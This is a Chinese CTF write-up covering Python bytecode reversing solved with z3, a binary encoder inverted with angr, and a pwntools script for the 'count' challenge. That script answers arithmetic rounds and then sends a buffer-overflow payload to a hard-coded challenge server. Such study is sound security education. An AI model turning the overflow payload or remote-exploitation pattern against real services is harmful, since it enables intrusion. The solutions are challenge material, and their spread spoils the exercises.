
又是自闭的一天。。

game

这一题是关于python字节码的题目,之前没有了解过,看了几篇关于python字节码的文章,死磕,手工还原。。

python字节码

# Python 2.7
# Embedded file name: game.py

1 0 LOAD_CONST 249
3 LOAD_CONST 91
6 LOAD_CONST 149
9 LOAD_CONST 113
12 LOAD_CONST 16
15 LOAD_CONST 91
18 LOAD_CONST 53
21 LOAD_CONST 41
24 BUILD_LIST_8 8
27 STORE_NAME 0 'arr0'

2 30 LOAD_CONST 43
33 LOAD_CONST 1
36 LOAD_CONST 6
39 LOAD_CONST 69
42 LOAD_CONST 20
45 LOAD_CONST 62
48 LOAD_CONST 6
51 LOAD_CONST 44
54 LOAD_CONST 24
57 LOAD_CONST 113
60 LOAD_CONST 6
63 LOAD_CONST 35
66 LOAD_CONST 0
69 LOAD_CONST 3
72 LOAD_CONST 6
75 LOAD_CONST 44
78 LOAD_CONST 20
81 LOAD_CONST 22
84 LOAD_CONST 127
87 LOAD_CONST 60
90 BUILD_LIST_20 20
93 STORE_NAME 1 'arr1'

3 96 LOAD_CONST 90
99 LOAD_CONST 100
102 LOAD_CONST 87
105 LOAD_CONST 109
108 LOAD_CONST 86
111 LOAD_CONST 108
114 LOAD_CONST 86
117 LOAD_CONST 105
120 LOAD_CONST 90
123 LOAD_CONST 104
126 LOAD_CONST 88
129 LOAD_CONST 102
132 BUILD_LIST_12 12
135 STORE_NAME 2 'arr2'

5 138 LOAD_CODE <code_object check0>
141 MAKE_FUNCTION_0 0 None
144 STORE_NAME 3 'check0'

8 147 LOAD_CODE <code_object check1>
150 MAKE_FUNCTION_0 0 None
153 STORE_NAME 4 'check1'

14 156 LOAD_CODE <code_object check2>
159 MAKE_FUNCTION_0 0 None
162 STORE_NAME 5 'check2'

20 165 LOAD_CODE <code_object check3>
168 MAKE_FUNCTION_0 0 None
171 STORE_NAME 6 'check3'

37 174 LOAD_NAME 7 'raw_input'
177 CALL_FUNCTION_0 0 None
180 STORE_NAME 8 'flag'

38 183 LOAD_NAME 3 'check0'
186 LOAD_NAME 8 'flag'
189 CALL_FUNCTION_1 1 None
192 POP_JUMP_IF_FALSE 239 'to 239'
195 LOAD_NAME 4 'check1'
198 LOAD_NAME 8 'flag'
201 CALL_FUNCTION_1 1 None
204 POP_JUMP_IF_FALSE 239 'to 239'
207 LOAD_NAME 5 'check2'
210 LOAD_NAME 8 'flag'
213 CALL_FUNCTION_1 1 None
216 POP_JUMP_IF_FALSE 239 'to 239'
219 LOAD_NAME 6 'check3'
222 LOAD_NAME 8 'flag'
225 CALL_FUNCTION_1 1 None
228_0 COME_FROM 216 '216'
228_1 COME_FROM 204 '204'
228_2 COME_FROM 192 '192'
228 POP_JUMP_IF_FALSE 239 'to 239'

39 231 LOAD_CONST 'ok'
234 PRINT_ITEM
235 PRINT_NEWLINE_CONT
236 JUMP_FORWARD 5 'to 244'

41 239 LOAD_CONST 'no'
242 PRINT_ITEM
243 PRINT_NEWLINE_CONT
244_0 COME_FROM 236 '236'
244 LOAD_CONST None
247 RETURN_VALUE

# check0 line 5 of game.py

6 0 LOAD_GLOBAL 0 'all'
3 LOAD_GENEXPR '<code_object <genexpr>>'
6 MAKE_FUNCTION_0 0 None
9 LOAD_FAST 0 's'
12 GET_ITER
13 CALL_FUNCTION_1 1 None
16 CALL_FUNCTION_1 1 None
19 RETURN_VALUE

# check1 line 8 of game.py

9 0 LOAD_GLOBAL 0 'len'
3 LOAD_FAST 0 's'
6 CALL_FUNCTION_1 1 None
9 LOAD_CONST 100
12 COMPARE_OP 0 <
15 POP_JUMP_IF_FALSE 58 'to 58'
18 LOAD_GLOBAL 0 'len'
21 LOAD_FAST 0 's'
24 CALL_FUNCTION_1 1 None
27 LOAD_GLOBAL 0 'len'
30 LOAD_FAST 0 's'
33 CALL_FUNCTION_1 1 None
36 BINARY_MULTIPLY
37 LOAD_CONST 777
40 BINARY_MODULO
41 LOAD_CONST 233
44 BINARY_XOR
45 LOAD_CONST 513
48 COMPARE_OP 2 ==
51_0 COME_FROM 15 '15'
51 POP_JUMP_IF_FALSE 58 'to 58'

10 54 LOAD_GLOBAL 1 'True'
57 RETURN_END_IF
58_0 COME_FROM 51 '51'

12 58 LOAD_GLOBAL 2 'False'
61 RETURN_VALUE
62 LOAD_CONST None
65 RETURN_VALUE

# check2 line 14 of game.py

15 0 LOAD_GLOBAL 0 'ord'
3 LOAD_FAST 0 's'
6 LOAD_CONST 0
9 BINARY_SUBSCR
10 CALL_FUNCTION_1 1 None
13 LOAD_CONST 128
16 BINARY_MULTIPLY
17 LOAD_GLOBAL 0 'ord'
20 LOAD_FAST 0 's'
23 LOAD_CONST 1
26 BINARY_SUBSCR
27 CALL_FUNCTION_1 1 None
30 BINARY_ADD
31 LOAD_CONST 128
34 BINARY_MULTIPLY
35 LOAD_GLOBAL 0 'ord'
38 LOAD_FAST 0 's'
41 LOAD_CONST 2
44 BINARY_SUBSCR
45 CALL_FUNCTION_1 1 None
48 BINARY_ADD
49 LOAD_CONST 128
52 BINARY_MULTIPLY
53 LOAD_GLOBAL 0 'ord'
56 LOAD_FAST 0 's'
59 LOAD_CONST 3
62 BINARY_SUBSCR
63 CALL_FUNCTION_1 1 None
66 BINARY_ADD
67 LOAD_CONST 128
70 BINARY_MULTIPLY
71 LOAD_GLOBAL 0 'ord'
74 LOAD_FAST 0 's'
77 LOAD_CONST 4
80 BINARY_SUBSCR
81 CALL_FUNCTION_1 1 None
84 BINARY_ADD
85 LOAD_CONST 128
88 BINARY_MULTIPLY
89 LOAD_GLOBAL 0 'ord'
92 LOAD_FAST 0 's'
95 LOAD_CONST 5
98 BINARY_SUBSCR
99 CALL_FUNCTION_1 1 None
102 BINARY_ADD
103 LOAD_CONST 3533889469877L
106 COMPARE_OP 2 ==
109 POP_JUMP_IF_FALSE 138 'to 138'
112 LOAD_GLOBAL 0 'ord'
115 LOAD_FAST 0 's'
118 LOAD_CONST -1
121 BINARY_SUBSCR
122 CALL_FUNCTION_1 1 None
125 LOAD_CONST 125
128 COMPARE_OP 2 ==
131_0 COME_FROM 109 '109'
131 POP_JUMP_IF_FALSE 138 'to 138'

16 134 LOAD_GLOBAL 1 'True'
137 RETURN_END_IF
138_0 COME_FROM 131 '131'

18 138 LOAD_GLOBAL 2 'False'
141 RETURN_VALUE
142 LOAD_CONST None
145 RETURN_VALUE

# check3 line 20 of game.py

21 0 LOAD_GLOBAL 0 'map'
3 LOAD_GLOBAL 1 'ord'
6 LOAD_FAST 0 's'
9 CALL_FUNCTION_2 2 None
12 STORE_FAST 1 'arr'

22 15 LOAD_FAST 1 'arr'
18 LOAD_CONST 6
21 LOAD_CONST 30
24 LOAD_CONST 3
27 BUILD_SLICE_3 3
30 BINARY_SUBSCR
31 STORE_FAST 2 'a'

23 34 SETUP_LOOP 62 'to 99'
37 LOAD_GLOBAL 2 'range'
40 LOAD_GLOBAL 3 'len'
43 LOAD_FAST 2 'a'
46 CALL_FUNCTION_1 1 None
49 CALL_FUNCTION_1 1 None
52 GET_ITER
53 FOR_ITER 42 'to 98'
56 STORE_FAST 3 'i'

24 59 LOAD_FAST 2 'a'
62 LOAD_FAST 3 'i'
65 BINARY_SUBSCR
66 LOAD_CONST 17684
69 BINARY_MULTIPLY
70 LOAD_CONST 372511
73 BINARY_ADD
74 LOAD_CONST 257
77 BINARY_MODULO
78 LOAD_GLOBAL 4 'arr0'
81 LOAD_FAST 3 'i'
84 BINARY_SUBSCR
85 COMPARE_OP 3 !=
88 POP_JUMP_IF_FALSE 53 'to 53'

25 91 LOAD_GLOBAL 5 'False'
94 RETURN_END_IF
95_0 COME_FROM 88 '88'
95 JUMP_BACK 53 'to 53'
98 POP_BLOCK
99_0 COME_FROM 34 '34'

26 99 LOAD_FAST 1 'arr'
102 LOAD_CONST -2
105 LOAD_CONST 33
108 LOAD_CONST -1
111 BUILD_SLICE_3 3
114 BINARY_SUBSCR
115 LOAD_CONST 5
118 BINARY_MULTIPLY
119 STORE_FAST 4 'b'

27 122 LOAD_GLOBAL 0 'map'
125 LOAD_LAMBDA '<code_object <lambda>>'
128 MAKE_FUNCTION_0 0 None
131 LOAD_GLOBAL 6 'zip'
134 LOAD_FAST 4 'b'
137 LOAD_FAST 1 'arr'
140 LOAD_CONST 7
143 LOAD_CONST 27
146 SLICE+3
147 CALL_FUNCTION_2 2 None
150 CALL_FUNCTION_2 2 None
153 STORE_FAST 5 'c'

28 156 LOAD_FAST 5 'c'
159 LOAD_GLOBAL 7 'arr1'
162 COMPARE_OP 3 !=
165 POP_JUMP_IF_FALSE 172 'to 172'

29 168 LOAD_GLOBAL 5 'False'
171 RETURN_END_IF
172_0 COME_FROM 165 '165'

30 172 LOAD_CONST 0
175 STORE_FAST 6 'p'

31 178 SETUP_LOOP 105 'to 286'
181 LOAD_GLOBAL 2 'range'
184 LOAD_CONST 28
187 LOAD_CONST 34
190 CALL_FUNCTION_2 2 None
193 GET_ITER
194 FOR_ITER 88 'to 285'
197 STORE_FAST 3 'i'

32 200 LOAD_FAST 1 'arr'
203 LOAD_FAST 3 'i'
206 BINARY_SUBSCR
207 LOAD_CONST 107
210 BINARY_ADD
211 LOAD_CONST 16
214 BINARY_DIVIDE
215 LOAD_CONST 77
218 BINARY_ADD
219 LOAD_GLOBAL 8 'arr2'
222 LOAD_FAST 6 'p'
225 BINARY_SUBSCR
226 COMPARE_OP 3 !=
229 POP_JUMP_IF_TRUE 268 'to 268'
232 LOAD_FAST 1 'arr'
235 LOAD_FAST 3 'i'
238 BINARY_SUBSCR
239 LOAD_CONST 117
242 BINARY_ADD
243 LOAD_CONST 16
246 BINARY_MODULO
247 LOAD_CONST 99
250 BINARY_ADD
251 LOAD_GLOBAL 8 'arr2'
254 LOAD_FAST 6 'p'
257 LOAD_CONST 1
260 BINARY_ADD
261 BINARY_SUBSCR
262 COMPARE_OP 3 !=
265_0 COME_FROM 229 '229'
265 POP_JUMP_IF_FALSE 272 'to 272'

33 268 LOAD_GLOBAL 9 'false'
271 RETURN_END_IF
272_0 COME_FROM 265 '265'

34 272 LOAD_FAST 6 'p'
275 LOAD_CONST 2
278 INPLACE_ADD
279 STORE_FAST 6 'p'
282 JUMP_BACK 194 'to 194'
285 POP_BLOCK
286_0 COME_FROM 178 '178'

35 286 LOAD_GLOBAL 10 'True'
289 RETURN_VALUE

# <genexpr> line 6 of game.py

6 0 LOAD_FAST 0 '.0'
3 FOR_ITER 32 'to 38'
6 STORE_FAST 1 'x'
9 LOAD_GLOBAL 0 'ord'
12 LOAD_FAST 1 'x'
15 CALL_FUNCTION_1 1 None
18 LOAD_GLOBAL 1 'range'
21 LOAD_CONST 32
24 LOAD_CONST 128
27 CALL_FUNCTION_2 2 None
30 COMPARE_OP 6 in
33 YIELD_VALUE
34 POP_TOP
35 JUMP_BACK 3 'to 3'
38 LOAD_CONST None
41 RETURN_VALUE

# <lambda> line 27 of game.py

27 0 LOAD_FAST 0 'x'
3 LOAD_CONST 0
6 BINARY_SUBSCR
7 LOAD_FAST 0 'x'
10 LOAD_CONST 1
13 BINARY_SUBSCR
14 BINARY_XOR
15 RETURN_VALUE
# Target tables recovered from the module-level BUILD_LIST constants of game.py
# (bytecode lines 1-3).  They must stay plain lists: check3 compares a list
# against arr1 with ``!=``.

# arr0: expected results of the affine map in check3's first loop, 8 entries.
arr0 = [
    249, 91, 149, 113,
    16, 91, 53, 41,
]

# arr1: expected XOR stream in check3's second test, 20 entries.
arr1 = [
    43, 1, 6, 69, 20,
    62, 6, 44, 24, 113,
    6, 35, 0, 3, 6,
    44, 20, 22, 127, 60,
]

# arr2: expected (high, low) nibble pairs in check3's last loop, 12 entries.
arr2 = [
    90, 100, 87, 109,
    86, 108, 86, 105,
    90, 104, 88, 102,
]

def check1(s):
    """Length gate reconstructed from the check1 bytecode.

    Returns True only when ``len(s) < 100`` and
    ``((len(s) * len(s)) % 777) ^ 233 == 513``; every other input yields False.
    """
    n = len(s)
    # Bytecode offsets 0-15: the length bound is tested first.
    if n >= 100:
        return False
    # Offsets 18-48: square, reduce mod 777, xor with 233, compare with 513.
    # ``%`` binds tighter than ``^``, matching the BINARY_MODULO / BINARY_XOR order.
    return (n * n % 777 ^ 233) == 513

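def check2(s):
    """Prefix/suffix gate reconstructed from the check2 bytecode.

    The first six characters are folded into one integer in base 128
    (``t = t * 128 + ord(c)``, most significant first) and compared with
    3533889469877; the last character must have code 125.  Returns True
    only when both hold.

    Fix against the earlier transcription: it read ``ord(s[-1] == 125)``,
    which passes a bool to ord().  The disassembly (LOAD_CONST -1,
    BINARY_SUBSCR, CALL_FUNCTION ord, LOAD_CONST 125, COMPARE_OP ==) is
    ``ord(s[-1]) == 125``.
    """
    # Fewer than six characters cannot fold to the target, and s[-1] would
    # fail on an empty string, so reject short input up front instead of
    # raising IndexError.
    if len(s) < 6:
        return False
    # Same arithmetic as the bytecode's repeated "* 128 ... + ord(s[k])" chain.
    t = 0
    for ch in s[:6]:
        t = t * 128 + ord(ch)
    if t != 3533889469877:
        return False
    return ord(s[-1]) == 125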

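def check3(s):
    """Return True when the character codes of s satisfy the three table checks.

    Reconstructed from the check3 bytecode; arr0, arr1 and arr2 are the
    module-level tables.  With ``arr = list(map(ord, s))``:

    1. for each v in ``arr[6:30:3]``, ``(v * 17684 + 372511) % 257`` must
       equal the matching entry of arr0;
    2. ``arr[-2:33:-1]`` tiled five times, XORed element-wise with
       ``arr[7:27]``, must equal arr1;
    3. for each index i in 28..33, ``(arr[i] + 107) // 16 + 77`` and
       ``(arr[i] + 117) % 16 + 99`` must equal the next two entries of arr2.

    Fix against the earlier transcription: it fell off the end of the
    function (implicit None, which the caller's ``if`` treats as failure);
    the disassembly ends with LOAD_GLOBAL 'True' / RETURN_VALUE, so a
    passing input returns True.  The bytecode also loads a global spelled
    ``false`` (lower case) on the failure branch of check 3, which would
    raise NameError in the original; the reconstruction returns False there.
    IndexError propagates when s is shorter than 34 characters (``arr[i]``
    for i up to 33), exactly as the bytecode would.
    """
    arr = list(map(ord, s))

    # Check 1: every third code from index 6 to 29 through an affine map mod 257.
    a = arr[6:30:3]
    for i, v in enumerate(a):
        if (v * 17684 + 372511) % 257 != arr0[i]:
            return False

    # Check 2: the tail (second-last code backwards down to index 34), tiled
    # five times, is the XOR key for codes 7..26.
    b = arr[-2:33:-1] * 5
    c = [x ^ y for x, y in zip(b, arr[7:27])]
    if c != arr1:
        return False

    # Check 3: codes 28..33 each produce two bytes that must match arr2 in
    # order.  BINARY_DIVIDE on Python 2 ints floors, hence ``//``.
    p = 0
    for i in range(28, 34):
        if (arr[i] + 107) // 16 + 77 != arr2[p]:
            return False
        if (arr[i] + 117) % 16 + 99 != arr2[p + 1]:
            return False
        p += 2
    return True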

使用z3爆破

from z3 import *

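# Target tables, copied from the reconstructed game.py.
arr0 = [249, 91, 149, 113, 16, 91, 53, 41]
arr1 = [43, 1, 6, 69, 20, 62, 6, 44, 24, 113, 6, 35, 0, 3, 6, 44, 20, 22, 127, 60]
arr2 = [90, 100, 87, 109, 86, 108, 86, 105, 90, 104, 88, 102]

# check1 constrains only the length, so recover it first with its own solver.
lens = BitVec('len', 32)
ts = Solver()
ts.add(((lens * lens) % 777) ^ 233 == 513)
ts.add(lens < 100)
# ``<`` on a BitVec is signed: without a lower bound z3 may return a negative
# (or wrapped) length, which would silently make range(lens) empty below.
ts.add(lens > 0)
if ts.check() != sat:
    raise SystemExit('check1: no admissible length found')
lens = ts.model()[lens].as_long()

# One 7-bit symbol per character (check0 already caps ord() below 128), each
# zero-extended to 64 bits so the base-128 fold of check2 cannot wrap.
s = [BitVec('s%d' % i, 7) for i in range(lens)]
padding = BitVecVal(0, 57)
sp = [Concat(padding, i) for i in s]
sol = Solver()

# check 0: ord(x) in range(32, 128); the upper bound is implied by the width,
# the lower one is added here.  The extended vectors are non-negative, so the
# signed ``>=`` is correct.
for ch in sp:
    sol.add(ch >= 32)

# check 2
t = sp[0]
for ch in sp[1:6]:
    t = t * 128 + ch
sol.add(t == 3533889469877)
sol.add(sp[-1] == 125)

# check 3
a = sp[6:30:3]
for i, v in enumerate(a):
    sol.add((v * 17684 + 372511) % 257 == arr0[i])
b = sp[-2:33:-1] * 5
c = [x ^ y for x, y in zip(b, sp[7:27])]
for i, v in enumerate(c):
    sol.add(v == arr1[i])
p = 0
for i in range(28, 34):
    # BitVec ``/`` and ``%`` are signed; fine here because sp is zero-extended.
    sol.add(((sp[i] + 107) / 16) + 77 == arr2[p])
    sol.add(((sp[i] + 117) % 16) + 99 == arr2[p + 1])
    p += 2

if sol.check() != sat:
    raise SystemExit('checks 0/2/3 are unsatisfiable for length %d' % lens)
answer = sol.model()
# model_completion fills in any symbol the model left unconstrained instead of
# returning None for it.
print(''.join(chr(answer.eval(ch, model_completion=True).as_long()) for ch in s))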

https://www.cnblogs.com/yinguohai/p/11158492.html

https://www.jianshu.com/p/10e6bc633938

https://blog.csdn.net/j2iayu7y/article/details/80276450

enc

一个可执行文件,一个enc文件,可执行文件相当于一个encoder,enc文件就是encode后的文件

26-28行,每次就算给相同的文件做encode,最后得到的结果也是不同的。那么如何知道这个文件是什么时间encode的呢?
右键->属性->修改时间

时间换成时间戳,1575018225。每次运行的时候都替换v4。
第29行函数401050,根据rand的结果生成一个16位的char数组,存入v14中,
第34行函数401010,就是sprintf,把刚刚生成的v14转换成文本,并存储到v12中。
第38行函数4012a0,v12相当于已经是定值了,v15是我们要输入的flag,经过这个函数后,v15就变成了密文了。
所以这个函数就是关键函数。
通过动态调试,直接在内存中拿到v12的值。

然后angr求解,对4012a0模拟执行,因为之前的都是定值,所以要对地址0x40154d-0x401558进行模拟执行

from angr import *
from claripy import *

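# Symbolic 16-byte input plus the two values that are fixed for this run.
flag = BVS('flag', 8 * 16)
result = BVV(b'\xae\xed\x13\x5c\xbd\xd2\xa1\x74\x9c\x4c\x5e\x02\xd3\x28\x9b\x60', 8 * 16)  # contents of the enc file
disasm = BVV(b'794c87696d24d16e7b9e3dddad778c93', 8 * 32)  # v12, the fixed value read from memory under the debugger
p = Project('task.exe', auto_load_libs=False)
# Route the binary's own allocator entry points to angr's libc models.
p.hook(0x405128, SIM_PROCEDURES['libc']['malloc']())
p.hook(0x4035e4, SIM_PROCEDURES['libc']['calloc']())
# Start at 0x40154d (the write-up's range for the sub_4012a0 call) so the
# earlier, constant setup is skipped entirely.
st = p.factory.full_init_state(addr=0x40154d, add_options={options.SYMBOLIC_WRITE_ADDRESSES,
                                                            options.REGION_MAPPING,
                                                            options.SYMBOL_FILL_UNCONSTRAINED_REGISTERS})
st.memory.store(st.regs.ebp, BVV(0, 32))  # angr bug (author's workaround; reason not recorded)
st.memory.store(st.regs.ebp - 0x24, flag)    # v15: the input buffer, read back below after the call
st.memory.store(st.regs.ebp - 0x54, disasm)  # v12
sim = p.factory.simgr(st)
sim.explore(find=0x401558)
# one_found raises a generic error when nothing reached the target; say why instead.
if not sim.found:
    raise SystemExit('no state reached 0x401558 - check the start address and the hooks')
f = sim.found[0]
# Constrain the transformed buffer to the enc contents and solve for the input.
f.solver.add(f.memory.load(f.regs.ebp - 0x24, 16) == result)
if not f.solver.satisfiable():
    raise SystemExit('enc contents are not reachable from any 16-byte input on this path')
print(f.solver.eval(flag, cast_to=bytes))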

count

import ast
import operator

from pwn import *
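def _safe_eval(expr):
    """Evaluate the arithmetic the server sends without handing it to eval().

    The remote end is an untrusted peer: the original script passed its
    text straight to eval(), so a malicious or compromised server could run
    arbitrary code on this host.  Here the text is parsed into an AST and
    only numeric literals, unary +/- and the binary operators + - * / // %
    are reduced; anything else raises ValueError instead of being executed.
    Division follows Python 3 ``/`` semantics, the same as eval() would.
    """
    binary = {
        ast.Add: operator.add,
        ast.Sub: operator.sub,
        ast.Mult: operator.mul,
        ast.Div: operator.truediv,
        ast.FloorDiv: operator.floordiv,
        ast.Mod: operator.mod,
    }
    unary = {ast.UAdd: operator.pos, ast.USub: operator.neg}

    def reduce_node(node):
        if isinstance(node, ast.Expression):
            return reduce_node(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in binary:
            return binary[type(node.op)](reduce_node(node.left), reduce_node(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in unary:
            return unary[type(node.op)](reduce_node(node.operand))
        raise ValueError('unsupported expression from server: %r' % (expr,))

    return reduce_node(ast.parse(expr, mode='eval'))


sh = remote("39.97.210.182", 40285)
# Answer the 200 arithmetic rounds; pwntools returns bytes, so decode before parsing.
for i in range(200):
    sh.recvuntil(b"~Math: ")
    data = sh.recvuntil(b" = ", drop=True).decode()
    answer = _safe_eval(data)
    sh.sendline(str(answer).encode())
magic = 0x12235612
# Build the payload as bytes throughout: on Python 3, 'a' * 0x64 + p64(...)
# raises TypeError (str + bytes).  The magic value now comes from the variable
# that was previously assigned but unused.
payload = b'a' * 0x64 + p64(magic)
sh.sendline(payload)
sh.interactive()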